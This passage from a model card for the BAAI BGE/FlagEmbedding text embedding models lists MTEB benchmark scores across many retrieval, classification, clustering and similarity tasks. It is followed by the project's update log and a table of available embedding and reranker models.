value: 97.188
- type: recall_at_1000
value: 98.555
- type: recall_at_3
value: 88.98700000000001
- type: recall_at_5
value: 91.373
- task:
type: Retrieval
dataset:
type: fiqa
name: MTEB FiQA2018
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 19.841
- type: map_at_10
value: 32.643
- type: map_at_100
value: 34.575
- type: map_at_1000
value: 34.736
- type: map_at_3
value: 28.317999999999998
- type: map_at_5
value: 30.964000000000002
- type: mrr_at_1
value: 39.660000000000004
- type: mrr_at_10
value: 48.620000000000005
- type: mrr_at_100
value: 49.384
- type: mrr_at_1000
value: 49.415
- type: mrr_at_3
value: 45.988
- type: mrr_at_5
value: 47.361
- type: ndcg_at_1
value: 39.660000000000004
- type: ndcg_at_10
value: 40.646
- type: ndcg_at_100
value: 47.657
- type: ndcg_at_1000
value: 50.428
- type: ndcg_at_3
value: 36.689
- type: ndcg_at_5
value: 38.211
- type: precision_at_1
value: 39.660000000000004
- type: precision_at_10
value: 11.235000000000001
- type: precision_at_100
value: 1.8530000000000002
- type: precision_at_1000
value: 0.23600000000000002
- type: precision_at_3
value: 24.587999999999997
- type: precision_at_5
value: 18.395
- type: recall_at_1
value: 19.841
- type: recall_at_10
value: 48.135
- type: recall_at_100
value: 74.224
- type: recall_at_1000
value: 90.826
- type: recall_at_3
value: 33.536
- type: recall_at_5
value: 40.311
- task:
type: Retrieval
dataset:
type: hotpotqa
name: MTEB HotpotQA
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 40.358
- type: map_at_10
value: 64.497
- type: map_at_100
value: 65.362
- type: map_at_1000
value: 65.41900000000001
- type: map_at_3
value: 61.06700000000001
- type: map_at_5
value: 63.317
- type: mrr_at_1
value: 80.716
- type: mrr_at_10
value: 86.10799999999999
- type: mrr_at_100
value: 86.265
- type: mrr_at_1000
value: 86.27
- type: mrr_at_3
value: 85.271
- type: mrr_at_5
value: 85.82499999999999
- type: ndcg_at_1
value: 80.716
- type: ndcg_at_10
value: 72.597
- type: ndcg_at_100
value: 75.549
- type: ndcg_at_1000
value: 76.61
- type: ndcg_at_3
value: 67.874
- type: ndcg_at_5
value: 70.655
- type: precision_at_1
value: 80.716
- type: precision_at_10
value: 15.148
- type: precision_at_100
value: 1.745
- type: precision_at_1000
value: 0.188
- type: precision_at_3
value: 43.597
- type: precision_at_5
value: 28.351
- type: recall_at_1
value: 40.358
- type: recall_at_10
value: 75.739
- type: recall_at_100
value: 87.259
- type: recall_at_1000
value: 94.234
- type: recall_at_3
value: 65.39500000000001
- type: recall_at_5
value: 70.878
- task:
type: Classification
dataset:
type: mteb/imdb
name: MTEB ImdbClassification
config: default
split: test
revision: 3d86128a09e091d6018b6d26cad27f2739fc2db7
metrics:
- type: accuracy
value: 90.80799999999998
- type: ap
value: 86.81350378180757
- type: f1
value: 90.79901248314215
- task:
type: Retrieval
dataset:
type: msmarco
name: MTEB MSMARCO
config: default
split: dev
revision: None
metrics:
- type: map_at_1
value: 22.096
- type: map_at_10
value: 34.384
- type: map_at_100
value: 35.541
- type: map_at_1000
value: 35.589999999999996
- type: map_at_3
value: 30.496000000000002
- type: map_at_5
value: 32.718
- type: mrr_at_1
value: 22.750999999999998
- type: mrr_at_10
value: 35.024
- type: mrr_at_100
value: 36.125
- type: mrr_at_1000
value: 36.168
- type: mrr_at_3
value: 31.225
- type: mrr_at_5
value: 33.416000000000004
- type: ndcg_at_1
value: 22.750999999999998
- type: ndcg_at_10
value: 41.351
- type: ndcg_at_100
value: 46.92
- type: ndcg_at_1000
value: 48.111
- type: ndcg_at_3
value: 33.439
- type: ndcg_at_5
value: 37.407000000000004
- type: precision_at_1
value: 22.750999999999998
- type: precision_at_10
value: 6.564
- type: precision_at_100
value: 0.935
- type: precision_at_1000
value: 0.104
- type: precision_at_3
value: 14.288
- type: precision_at_5
value: 10.581999999999999
- type: recall_at_1
value: 22.096
- type: recall_at_10
value: 62.771
- type: recall_at_100
value: 88.529
- type: recall_at_1000
value: 97.55
- type: recall_at_3
value: 41.245
- type: recall_at_5
value: 50.788
- task:
type: Classification
dataset:
type: mteb/mtop_domain
name: MTEB MTOPDomainClassification (en)
config: en
split: test
revision: d80d48c1eb48d3562165c59d59d0034df9fff0bf
metrics:
- type: accuracy
value: 94.16780665754673
- type: f1
value: 93.96331194859894
- task:
type: Classification
dataset:
type: mteb/mtop_intent
name: MTEB MTOPIntentClassification (en)
config: en
split: test
revision: ae001d0e6b1228650b7bd1c2c65fb50ad11a8aba
metrics:
- type: accuracy
value: 76.90606475148198
- type: f1
value: 58.58344986604187
- task:
type: Classification
dataset:
type: mteb/amazon_massive_intent
name: MTEB MassiveIntentClassification (en)
config: en
split: test
revision: 31efe3c427b0bae9c22cbb560b8f15491cc6bed7
metrics:
- type: accuracy
value: 76.14660390047075
- type: f1
value: 74.31533923533614
- task:
type: Classification
dataset:
type: mteb/amazon_massive_scenario
name: MTEB MassiveScenarioClassification (en)
config: en
split: test
revision: 7d571f92784cd94a019292a1f45445077d0ef634
metrics:
- type: accuracy
value: 80.16139878950908
- type: f1
value: 80.18532656824924
- task:
type: Clustering
dataset:
type: mteb/medrxiv-clustering-p2p
name: MTEB MedrxivClusteringP2P
config: default
split: test
revision: e7a26af6f3ae46b30dde8737f02c07b1505bcc73
metrics:
- type: v_measure
value: 32.949880906135085
- task:
type: Clustering
dataset:
type: mteb/medrxiv-clustering-s2s
name: MTEB MedrxivClusteringS2S
config: default
split: test
revision: 35191c8c0dca72d8ff3efcd72aa802307d469663
metrics:
- type: v_measure
value: 31.56300351524862
- task:
type: Reranking
dataset:
type: mteb/mind_small
name: MTEB MindSmallReranking
config: default
split: test
revision: 3bdac13927fdc888b903db93b2ffdbd90b295a69
metrics:
- type: map
value: 31.196521894371315
- type: mrr
value: 32.22644231694389
- task:
type: Retrieval
dataset:
type: nfcorpus
name: MTEB NFCorpus
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 6.783
- type: map_at_10
value: 14.549000000000001
- type: map_at_100
value: 18.433
- type: map_at_1000
value: 19.949
- type: map_at_3
value: 10.936
- type: map_at_5
value: 12.514
- type: mrr_at_1
value: 47.368
- type: mrr_at_10
value: 56.42
- type: mrr_at_100
value: 56.908
- type: mrr_at_1000
value: 56.95
- type: mrr_at_3
value: 54.283
- type: mrr_at_5
value: 55.568
- type: ndcg_at_1
value: 45.666000000000004
- type: ndcg_at_10
value: 37.389
- type: ndcg_at_100
value: 34.253
- type: ndcg_at_1000
value: 43.059999999999995
- type: ndcg_at_3
value: 42.725
- type: ndcg_at_5
value: 40.193
- type: precision_at_1
value: 47.368
- type: precision_at_10
value: 27.988000000000003
- type: precision_at_100
value: 8.672
- type: precision_at_1000
value: 2.164
- type: precision_at_3
value: 40.248
- type: precision_at_5
value: 34.737
- type: recall_at_1
value: 6.783
- type: recall_at_10
value: 17.838
- type: recall_at_100
value: 33.672000000000004
- type: recall_at_1000
value: 66.166
- type: recall_at_3
value: 11.849
- type: recall_at_5
value: 14.205000000000002
- task:
type: Retrieval
dataset:
type: nq
name: MTEB NQ
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 31.698999999999998
- type: map_at_10
value: 46.556
- type: map_at_100
value: 47.652
- type: map_at_1000
value: 47.68
- type: map_at_3
value: 42.492000000000004
- type: map_at_5
value: 44.763999999999996
- type: mrr_at_1
value: 35.747
- type: mrr_at_10
value: 49.242999999999995
- type: mrr_at_100
value: 50.052
- type: mrr_at_1000
value: 50.068
- type: mrr_at_3
value: 45.867000000000004
- type: mrr_at_5
value: 47.778999999999996
- type: ndcg_at_1
value: 35.717999999999996
- type: ndcg_at_10
value: 54.14600000000001
- type: ndcg_at_100
value: 58.672999999999995
- type: ndcg_at_1000
value: 59.279
- type: ndcg_at_3
value: 46.407
- type: ndcg_at_5
value: 50.181
- type: precision_at_1
value: 35.717999999999996
- type: precision_at_10
value: 8.844000000000001
- type: precision_at_100
value: 1.139
- type: precision_at_1000
value: 0.12
- type: precision_at_3
value: 20.993000000000002
- type: precision_at_5
value: 14.791000000000002
- type: recall_at_1
value: 31.698999999999998
- type: recall_at_10
value: 74.693
- type: recall_at_100
value: 94.15299999999999
- type: recall_at_1000
value: 98.585
- type: recall_at_3
value: 54.388999999999996
- type: recall_at_5
value: 63.08200000000001
- task:
type: Retrieval
dataset:
type: quora
name: MTEB QuoraRetrieval
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 71.283
- type: map_at_10
value: 85.24000000000001
- type: map_at_100
value: 85.882
- type: map_at_1000
value: 85.897
- type: map_at_3
value: 82.326
- type: map_at_5
value: 84.177
- type: mrr_at_1
value: 82.21000000000001
- type: mrr_at_10
value: 88.228
- type: mrr_at_100
value: 88.32
- type: mrr_at_1000
value: 88.32
- type: mrr_at_3
value: 87.323
- type: mrr_at_5
value: 87.94800000000001
- type: ndcg_at_1
value: 82.17999999999999
- type: ndcg_at_10
value: 88.9
- type: ndcg_at_100
value: 90.079
- type: ndcg_at_1000
value: 90.158
- type: ndcg_at_3
value: 86.18299999999999
- type: ndcg_at_5
value: 87.71799999999999
- type: precision_at_1
value: 82.17999999999999
- type: precision_at_10
value: 13.464
- type: precision_at_100
value: 1.533
- type: precision_at_1000
value: 0.157
- type: precision_at_3
value: 37.693
- type: precision_at_5
value: 24.792
- type: recall_at_1
value: 71.283
- type: recall_at_10
value: 95.742
- type: recall_at_100
value: 99.67200000000001
- type: recall_at_1000
value: 99.981
- type: recall_at_3
value: 87.888
- type: recall_at_5
value: 92.24
- task:
type: Clustering
dataset:
type: mteb/reddit-clustering
name: MTEB RedditClustering
config: default
split: test
revision: 24640382cdbf8abc73003fb0fa6d111a705499eb
metrics:
- type: v_measure
value: 56.24267063669042
- task:
type: Clustering
dataset:
type: mteb/reddit-clustering-p2p
name: MTEB RedditClusteringP2P
config: default
split: test
revision: 282350215ef01743dc01b456c7f5241fa8937f16
metrics:
- type: v_measure
value: 62.88056988932578
- task:
type: Retrieval
dataset:
type: scidocs
name: MTEB SCIDOCS
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 4.903
- type: map_at_10
value: 13.202
- type: map_at_100
value: 15.5
- type: map_at_1000
value: 15.870999999999999
- type: map_at_3
value: 9.407
- type: map_at_5
value: 11.238
- type: mrr_at_1
value: 24.2
- type: mrr_at_10
value: 35.867
- type: mrr_at_100
value: 37.001
- type: mrr_at_1000
value: 37.043
- type: mrr_at_3
value: 32.5
- type: mrr_at_5
value: 34.35
- type: ndcg_at_1
value: 24.2
- type: ndcg_at_10
value: 21.731
- type: ndcg_at_100
value: 30.7
- type: ndcg_at_1000
value: 36.618
- type: ndcg_at_3
value: 20.72
- type: ndcg_at_5
value: 17.954
- type: precision_at_1
value: 24.2
- type: precision_at_10
value: 11.33
- type: precision_at_100
value: 2.4410000000000003
- type: precision_at_1000
value: 0.386
- type: precision_at_3
value: 19.667
- type: precision_at_5
value: 15.86
- type: recall_at_1
value: 4.903
- type: recall_at_10
value: 22.962
- type: recall_at_100
value: 49.563
- type: recall_at_1000
value: 78.238
- type: recall_at_3
value: 11.953
- type: recall_at_5
value: 16.067999999999998
- task:
type: STS
dataset:
type: mteb/sickr-sts
name: MTEB SICK-R
config: default
split: test
revision: a6ea5a8cab320b040a23452cc28066d9beae2cee
metrics:
- type: cos_sim_pearson
value: 84.12694254604078
- type: cos_sim_spearman
value: 80.30141815181918
- type: euclidean_pearson
value: 81.34015449877128
- type: euclidean_spearman
value: 80.13984197010849
- type: manhattan_pearson
value: 81.31767068124086
- type: manhattan_spearman
value: 80.11720513114103
- task:
type: STS
dataset:
type: mteb/sts12-sts
name: MTEB STS12
config: default
split: test
revision: a0d554a64d88156834ff5ae9920b964011b16384
metrics:
- type: cos_sim_pearson
value: 86.13112984010417
- type: cos_sim_spearman
value: 78.03063573402875
- type: euclidean_pearson
value: 83.51928418844804
- type: euclidean_spearman
value: 78.4045235411144
- type: manhattan_pearson
value: 83.49981637388689
- type: manhattan_spearman
value: 78.4042575139372
- task:
type: STS
dataset:
type: mteb/sts13-sts
name: MTEB STS13
config: default
split: test
revision: 7e90230a92c190f1bf69ae9002b8cea547a64cca
metrics:
- type: cos_sim_pearson
value: 82.50327987379504
- type: cos_sim_spearman
value: 84.18556767756205
- type: euclidean_pearson
value: 82.69684424327679
- type: euclidean_spearman
value: 83.5368106038335
- type: manhattan_pearson
value: 82.57967581007374
- type: manhattan_spearman
value: 83.43009053133697
- task:
type: STS
dataset:
type: mteb/sts14-sts
name: MTEB STS14
config: default
split: test
revision: 6031580fec1f6af667f0bd2da0a551cf4f0b2375
metrics:
- type: cos_sim_pearson
value: 82.50756863007814
- type: cos_sim_spearman
value: 82.27204331279108
- type: euclidean_pearson
value: 81.39535251429741
- type: euclidean_spearman
value: 81.84386626336239
- type: manhattan_pearson
value: 81.34281737280695
- type: manhattan_spearman
value: 81.81149375673166
- task:
type: STS
dataset:
type: mteb/sts15-sts
name: MTEB STS15
config: default
split: test
revision: ae752c7c21bf194d8b67fd573edf7ae58183cbe3
metrics:
- type: cos_sim_pearson
value: 86.8727714856726
- type: cos_sim_spearman
value: 87.95738287792312
- type: euclidean_pearson
value: 86.62920602795887
- type: euclidean_spearman
value: 87.05207355381243
- type: manhattan_pearson
value: 86.53587918472225
- type: manhattan_spearman
value: 86.95382961029586
- task:
type: STS
dataset:
type: mteb/sts16-sts
name: MTEB STS16
config: default
split: test
revision: 4d8694f8f0e0100860b497b999b3dbed754a0513
metrics:
- type: cos_sim_pearson
value: 83.52240359769479
- type: cos_sim_spearman
value: 85.47685776238286
- type: euclidean_pearson
value: 84.25815333483058
- type: euclidean_spearman
value: 85.27415639683198
- type: manhattan_pearson
value: 84.29127757025637
- type: manhattan_spearman
value: 85.30226224917351
- task:
type: STS
dataset:
type: mteb/sts17-crosslingual-sts
name: MTEB STS17 (en-en)
config: en-en
split: test
revision: af5e6fb845001ecf41f4c1e033ce921939a2a68d
metrics:
- type: cos_sim_pearson
value: 86.42501708915708
- type: cos_sim_spearman
value: 86.42276182795041
- type: euclidean_pearson
value: 86.5408207354761
- type: euclidean_spearman
value: 85.46096321750838
- type: manhattan_pearson
value: 86.54177303026881
- type: manhattan_spearman
value: 85.50313151916117
- task:
type: STS
dataset:
type: mteb/sts22-crosslingual-sts
name: MTEB STS22 (en)
config: en
split: test
revision: 6d1ba47164174a496b7fa5d3569dae26a6813b80
metrics:
- type: cos_sim_pearson
value: 64.86521089250766
- type: cos_sim_spearman
value: 65.94868540323003
- type: euclidean_pearson
value: 67.16569626533084
- type: euclidean_spearman
value: 66.37667004134917
- type: manhattan_pearson
value: 67.1482365102333
- type: manhattan_spearman
value: 66.53240122580029
- task:
type: STS
dataset:
type: mteb/stsbenchmark-sts
name: MTEB STSBenchmark
config: default
split: test
revision: b0fddb56ed78048fa8b90373c8a3cfc37b684831
metrics:
- type: cos_sim_pearson
value: 84.64746265365318
- type: cos_sim_spearman
value: 86.41888825906786
- type: euclidean_pearson
value: 85.27453642725811
- type: euclidean_spearman
value: 85.94095796602544
- type: manhattan_pearson
value: 85.28643660505334
- type: manhattan_spearman
value: 85.95028003260744
- task:
type: Reranking
dataset:
type: mteb/scidocs-reranking
name: MTEB SciDocsRR
config: default
split: test
revision: d3c5e1fc0b855ab6097bf1cda04dd73947d7caab
metrics:
- type: map
value: 87.48903153618527
- type: mrr
value: 96.41081503826601
- task:
type: Retrieval
dataset:
type: scifact
name: MTEB SciFact
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 58.594
- type: map_at_10
value: 69.296
- type: map_at_100
value: 69.782
- type: map_at_1000
value: 69.795
- type: map_at_3
value: 66.23
- type: map_at_5
value: 68.293
- type: mrr_at_1
value: 61.667
- type: mrr_at_10
value: 70.339
- type: mrr_at_100
value: 70.708
- type: mrr_at_1000
value: 70.722
- type: mrr_at_3
value: 68.0
- type: mrr_at_5
value: 69.56700000000001
- type: ndcg_at_1
value: 61.667
- type: ndcg_at_10
value: 74.039
- type: ndcg_at_100
value: 76.103
- type: ndcg_at_1000
value: 76.47800000000001
- type: ndcg_at_3
value: 68.967
- type: ndcg_at_5
value: 71.96900000000001
- type: precision_at_1
value: 61.667
- type: precision_at_10
value: 9.866999999999999
- type: precision_at_100
value: 1.097
- type: precision_at_1000
value: 0.11299999999999999
- type: precision_at_3
value: 27.111
- type: precision_at_5
value: 18.2
- type: recall_at_1
value: 58.594
- type: recall_at_10
value: 87.422
- type: recall_at_100
value: 96.667
- type: recall_at_1000
value: 99.667
- type: recall_at_3
value: 74.217
- type: recall_at_5
value: 81.539
- task:
type: PairClassification
dataset:
type: mteb/sprintduplicatequestions-pairclassification
name: MTEB SprintDuplicateQuestions
config: default
split: test
revision: d66bd1f72af766a5cc4b0ca5e00c162f89e8cc46
metrics:
- type: cos_sim_accuracy
value: 99.85049504950496
- type: cos_sim_ap
value: 96.33111544137081
- type: cos_sim_f1
value: 92.35443037974684
- type: cos_sim_precision
value: 93.53846153846153
- type: cos_sim_recall
value: 91.2
- type: dot_accuracy
value: 99.82376237623762
- type: dot_ap
value: 95.38082527310888
- type: dot_f1
value: 90.90909090909092
- type: dot_precision
value: 92.90187891440502
- type: dot_recall
value: 89.0
- type: euclidean_accuracy
value: 99.84851485148515
- type: euclidean_ap
value: 96.32316003996347
- type: euclidean_f1
value: 92.2071392659628
- type: euclidean_precision
value: 92.71991911021233
- type: euclidean_recall
value: 91.7
- type: manhattan_accuracy
value: 99.84851485148515
- type: manhattan_ap
value: 96.3655668249217
- type: manhattan_f1
value: 92.18356026222895
- type: manhattan_precision
value: 92.98067141403867
- type: manhattan_recall
value: 91.4
- type: max_accuracy
value: 99.85049504950496
- type: max_ap
value: 96.3655668249217
- type: max_f1
value: 92.35443037974684
- task:
type: Clustering
dataset:
type: mteb/stackexchange-clustering
name: MTEB StackExchangeClustering
config: default
split: test
revision: 6cbc1f7b2bc0622f2e39d2c77fa502909748c259
metrics:
- type: v_measure
value: 65.94861371629051
- task:
type: Clustering
dataset:
type: mteb/stackexchange-clustering-p2p
name: MTEB StackExchangeClusteringP2P
config: default
split: test
revision: 815ca46b2622cec33ccafc3735d572c266efdb44
metrics:
- type: v_measure
value: 35.009430451385
- task:
type: Reranking
dataset:
type: mteb/stackoverflowdupquestions-reranking
name: MTEB StackOverflowDupQuestions
config: default
split: test
revision: e185fbe320c72810689fc5848eb6114e1ef5ec69
metrics:
- type: map
value: 54.61164066427969
- type: mrr
value: 55.49710603938544
- task:
type: Summarization
dataset:
type: mteb/summeval
name: MTEB SummEval
config: default
split: test
revision: cda12ad7615edc362dbf25a00fdd61d3b1eaf93c
metrics:
- type: cos_sim_pearson
value: 30.622620124907662
- type: cos_sim_spearman
value: 31.0678351356163
- type: dot_pearson
value: 30.863727693306814
- type: dot_spearman
value: 31.230306567021255
- task:
type: Retrieval
dataset:
type: trec-covid
name: MTEB TRECCOVID
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 0.22
- type: map_at_10
value: 2.011
- type: map_at_100
value: 10.974
- type: map_at_1000
value: 25.819
- type: map_at_3
value: 0.6649999999999999
- type: map_at_5
value: 1.076
- type: mrr_at_1
value: 86.0
- type: mrr_at_10
value: 91.8
- type: mrr_at_100
value: 91.8
- type: mrr_at_1000
value: 91.8
- type: mrr_at_3
value: 91.0
- type: mrr_at_5
value: 91.8
- type: ndcg_at_1
value: 82.0
- type: ndcg_at_10
value: 78.07300000000001
- type: ndcg_at_100
value: 58.231
- type: ndcg_at_1000
value: 51.153000000000006
- type: ndcg_at_3
value: 81.123
- type: ndcg_at_5
value: 81.059
- type: precision_at_1
value: 86.0
- type: precision_at_10
value: 83.0
- type: precision_at_100
value: 59.38
- type: precision_at_1000
value: 22.55
- type: precision_at_3
value: 87.333
- type: precision_at_5
value: 86.8
- type: recall_at_1
value: 0.22
- type: recall_at_10
value: 2.2079999999999997
- type: recall_at_100
value: 14.069
- type: recall_at_1000
value: 47.678
- type: recall_at_3
value: 0.7040000000000001
- type: recall_at_5
value: 1.161
- task:
type: Retrieval
dataset:
type: webis-touche2020
name: MTEB Touche2020
config: default
split: test
revision: None
metrics:
- type: map_at_1
value: 2.809
- type: map_at_10
value: 10.394
- type: map_at_100
value: 16.598
- type: map_at_1000
value: 18.142
- type: map_at_3
value: 5.572
- type: map_at_5
value: 7.1370000000000005
- type: mrr_at_1
value: 32.653
- type: mrr_at_10
value: 46.564
- type: mrr_at_100
value: 47.469
- type: mrr_at_1000
value: 47.469
- type: mrr_at_3
value: 42.177
- type: mrr_at_5
value: 44.524
- type: ndcg_at_1
value: 30.612000000000002
- type: ndcg_at_10
value: 25.701
- type: ndcg_at_100
value: 37.532
- type: ndcg_at_1000
value: 48.757
- type: ndcg_at_3
value: 28.199999999999996
- type: ndcg_at_5
value: 25.987
- type: precision_at_1
value: 32.653
- type: precision_at_10
value: 23.469
- type: precision_at_100
value: 7.9799999999999995
- type: precision_at_1000
value: 1.5350000000000001
- type: precision_at_3
value: 29.932
- type: precision_at_5
value: 26.122
- type: recall_at_1
value: 2.809
- type: recall_at_10
value: 16.887
- type: recall_at_100
value: 48.67
- type: recall_at_1000
value: 82.89699999999999
- type: recall_at_3
value: 6.521000000000001
- type: recall_at_5
value: 9.609
- task:
type: Classification
dataset:
type: mteb/toxic_conversations_50k
name: MTEB ToxicConversationsClassification
config: default
split: test
revision: d7c0de2777da35d6aae2200a62c6e0e5af397c4c
metrics:
- type: accuracy
value: 71.57860000000001
- type: ap
value: 13.82629211536393
- type: f1
value: 54.59860966183956
- task:
type: Classification
dataset:
type: mteb/tweet_sentiment_extraction
name: MTEB TweetSentimentExtractionClassification
config: default
split: test
revision: d604517c81ca91fe16a244d1248fc021f9ecee7a
metrics:
- type: accuracy
value: 59.38030560271647
- type: f1
value: 59.69685552567865
- task:
type: Clustering
dataset:
type: mteb/twentynewsgroups-clustering
name: MTEB TwentyNewsgroupsClustering
config: default
split: test
revision: 6125ec4e24fa026cec8a478383ee943acfbd5449
metrics:
- type: v_measure
value: 51.4736717043405
- task:
type: PairClassification
dataset:
type: mteb/twittersemeval2015-pairclassification
name: MTEB TwitterSemEval2015
config: default
split: test
revision: 70970daeab8776df92f5ea462b6173c0b46fd2d1
metrics:
- type: cos_sim_accuracy
value: 86.92853311080646
- type: cos_sim_ap
value: 77.67872502591382
- type: cos_sim_f1
value: 70.33941236068895
- type: cos_sim_precision
value: 67.63273258645884
- type: cos_sim_recall
value: 73.27176781002639
- type: dot_accuracy
value: 85.79603027954938
- type: dot_ap
value: 73.73786190233379
- type: dot_f1
value: 67.3437901774235
- type: dot_precision
value: 65.67201604814443
- type: dot_recall
value: 69.10290237467018
- type: euclidean_accuracy
value: 86.94045419324074
- type: euclidean_ap
value: 77.6687791535167
- type: euclidean_f1
value: 70.47209214023542
- type: euclidean_precision
value: 67.7207492094381
- type: euclidean_recall
value: 73.45646437994723
- type: manhattan_accuracy
value: 86.87488823985218
- type: manhattan_ap
value: 77.63373392430728
- type: manhattan_f1
value: 70.40920716112532
- type: manhattan_precision
value: 68.31265508684864
- type: manhattan_recall
value: 72.63852242744063
- type: max_accuracy
value: 86.94045419324074
- type: max_ap
value: 77.67872502591382
- type: max_f1
value: 70.47209214023542
- task:
type: PairClassification
dataset:
type: mteb/twitterurlcorpus-pairclassification
name: MTEB TwitterURLCorpus
config: default
split: test
revision: 8b6510b0b1fa4e4c4f879467980e9be563ec1cdf
metrics:
- type: cos_sim_accuracy
value: 88.67155664221679
- type: cos_sim_ap
value: 85.64591703003417
- type: cos_sim_f1
value: 77.59531005352656
- type: cos_sim_precision
value: 73.60967184801382
- type: cos_sim_recall
value: 82.03726516784724
- type: dot_accuracy
value: 88.41541506578181
- type: dot_ap
value: 84.6482788957769
- type: dot_f1
value: 77.04748541466657
- type: dot_precision
value: 74.02440754931176
- type: dot_recall
value: 80.3279950723745
- type: euclidean_accuracy
value: 88.63080684596576
- type: euclidean_ap
value: 85.44570045321562
- type: euclidean_f1
value: 77.28769403336106
- type: euclidean_precision
value: 72.90600040958427
- type: euclidean_recall
value: 82.22975053895904
- type: manhattan_accuracy
value: 88.59393798269105
- type: manhattan_ap
value: 85.40271361038187
- type: manhattan_f1
value: 77.17606419344392
- type: manhattan_precision
value: 72.4447747078295
- type: manhattan_recall
value: 82.5685247921158
- type: max_accuracy
value: 88.67155664221679
- type: max_ap
value: 85.64591703003417
- type: max_f1
value: 77.59531005352656
license: mit
language:
- en
---
<h1 align="center">FlagEmbedding</h1>
<h4 align="center">
<p>
<a href="#model-list">Model List</a> |
<a href="#frequently-asked-questions">FAQ</a> |
<a href="#usage">Usage</a>  |
<a href="#evaluation">Evaluation</a> |
<a href="#train">Train</a> |
<a href="#contact">Contact</a> |
<a href="#citation">Citation</a> |
<a href="#license">License</a>
</p>
</h4>
For more details, please refer to our GitHub: [FlagEmbedding](https://github.com/FlagOpen/FlagEmbedding).
[English](README.md) | [中文](https://github.com/FlagOpen/FlagEmbedding/blob/master/README_zh.md)
FlagEmbedding maps any text to a low-dimensional dense vector that can be used for tasks like retrieval, classification, clustering, or semantic search.
It can also be used in vector databases for LLMs.
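As a quick illustration, here is a minimal sketch assuming the `sentence-transformers` package is installed; the query instruction prefix shown comes from the model list below:

```python
# Minimal sketch (assumes `pip install sentence-transformers`).
from sentence_transformers import SentenceTransformer

model = SentenceTransformer("BAAI/bge-base-en-v1.5")

# The v1.5 models can take the retrieval instruction shown in the model list below;
# it is optional for v1.5 but can help with short queries.
query = "Represent this sentence for searching relevant passages: what is a dense vector?"
passages = [
    "A dense vector is a fixed-length array of real numbers produced by an embedding model.",
    "GGUF is a file format used by llama.cpp for quantized models.",
]

q_emb = model.encode([query], normalize_embeddings=True)
p_emb = model.encode(passages, normalize_embeddings=True)
scores = q_emb @ p_emb.T  # cosine similarity, since the embeddings are normalized
print(scores)
```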
************* 🌟**Updates**🌟 *************
- 10/12/2023: Release [LLM-Embedder](./FlagEmbedding/llm_embedder/README.md), a unified embedding model to support diverse retrieval augmentation needs for LLMs. [Paper](https://arxiv.org/pdf/2310.07554.pdf) :fire:
- 09/15/2023: The [technical report](https://arxiv.org/pdf/2309.07597.pdf) of BGE has been released
- 09/15/2023: The [massive training data](https://data.baai.ac.cn/details/BAAI-MTP) of BGE has been released
- 09/12/2023: New models:
- **New reranker model**: release cross-encoder models `BAAI/bge-reranker-base` and `BAAI/bge-reranker-large`, which are more powerful than the embedding models. We recommend using or fine-tuning them to re-rank the top-k documents returned by embedding models (a usage sketch follows this update list).
- **Updated embedding model**: release the `bge-*-v1.5` embedding models to alleviate the issue of the similarity distribution and enhance retrieval ability without an instruction.
<details>
<summary>More</summary>
<!-- ### More -->
- 09/07/2023: Update [fine-tune code](https://github.com/FlagOpen/FlagEmbedding/blob/master/FlagEmbedding/baai_general_embedding/README.md): add a script to mine hard negatives and support adding an instruction during fine-tuning.
- 08/09/2023: BGE models are integrated into **LangChain**; you can use them like [this](#using-langchain). The C-MTEB **leaderboard** is [available](https://huggingface.co/spaces/mteb/leaderboard).
- 08/05/2023: Release base-scale and small-scale models with the **best performance among models of the same size 🤗**
- 08/02/2023: Release the `bge-large-*` (short for BAAI General Embedding) models, **ranked 1st on the MTEB and C-MTEB benchmarks!** :tada: :tada:
- 08/01/2023: We release the [Chinese Massive Text Embedding Benchmark](https://github.com/FlagOpen/FlagEmbedding/blob/master/C_MTEB) (**C-MTEB**), consisting of 31 test dataset.
</details>
## Model List
`bge` is short for `BAAI general embedding`.
| Model | Language | | Description | query instruction for retrieval [1] |
|:-------------------------------|:--------:| :--------:| :--------:|:--------:|
| [BAAI/llm-embedder](https://huggingface.co/BAAI/llm-embedder) | English | [Inference](./FlagEmbedding/llm_embedder/README.md) [Fine-tune](./FlagEmbedding/llm_embedder/README.md) | a unified embedding model to support diverse retrieval augmentation needs for LLMs | See [README](./FlagEmbedding/llm_embedder/README.md) |
| [BAAI/bge-reranker-large](https://huggingface.co/BAAI/bge-reranker-large) | Chinese and English | [Inference](#usage-for-reranker) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/reranker) | a cross-encoder model which is more accurate but less efficient [2] | |
| [BAAI/bge-reranker-base](https://huggingface.co/BAAI/bge-reranker-base) | Chinese and English | [Inference](#usage-for-reranker) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/reranker) | a cross-encoder model which is more accurate but less efficient [2] | |
| [BAAI/bge-large-en-v1.5](https://huggingface.co/BAAI/bge-large-en-v1.5) | English | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | version 1.5 with more reasonable similarity distribution | `Represent this sentence for searching relevant passages: ` |
| [BAAI/bge-base-en-v1.5](https://huggingface.co/BAAI/bge-base-en-v1.5) | English | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | version 1.5 with more reasonable similarity distribution | `Represent this sentence for searching relevant passages: ` |
| [BAAI/bge-small-en-v1.5](https://huggingface.co/BAAI/bge-small-en-v1.5) | English | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | version 1.5 with more reasonable similarity distribution | `Represent this sentence for searching relevant passages: ` |
| [BAAI/bge-large-zh-v1.5](https://huggingface.co/BAAI/bge-large-zh-v1.5) | Chinese | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | version 1.5 with more reasonable similarity distribution | `为这个句子生成表示以用于检索相关文章:` |
